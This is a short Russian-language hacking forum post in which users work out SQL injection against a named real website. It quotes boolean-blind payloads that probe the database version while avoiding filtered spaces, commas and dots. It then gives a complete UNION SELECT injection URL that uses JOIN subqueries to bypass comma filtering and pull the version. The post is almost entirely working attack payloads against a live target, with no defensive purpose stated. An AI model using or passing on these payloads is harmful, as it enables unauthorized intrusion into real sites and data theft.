05.01.2012, 12:44
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Сообщение от M_script
M_script said:
Нельзя использовать пробел, запятую, слеш, процент, возможно что-то еще. Нашел такой вариант:
1)
false
. редирект есть. version() like '4%'
/desktop'and(version())like(0x3425)and'1
2)
true
. редиректа нет. version() like '5%'.
/desktop'and(version())like(0x3525)and'1
upd:
Точка вырезается, так что придется брутить имена таблиц и колонок
Не пугай парня
Вывод:
http://www.obnovi-soft.ru/desktop' and 1=2 union select * from (select 1)a join (select 2)b join (select version())c join (select 4)d join (select 5)i-- '1
Пробелы норм, проблема с запятыми, ну и дальше с точками будет, как ты и сказал
|
|
|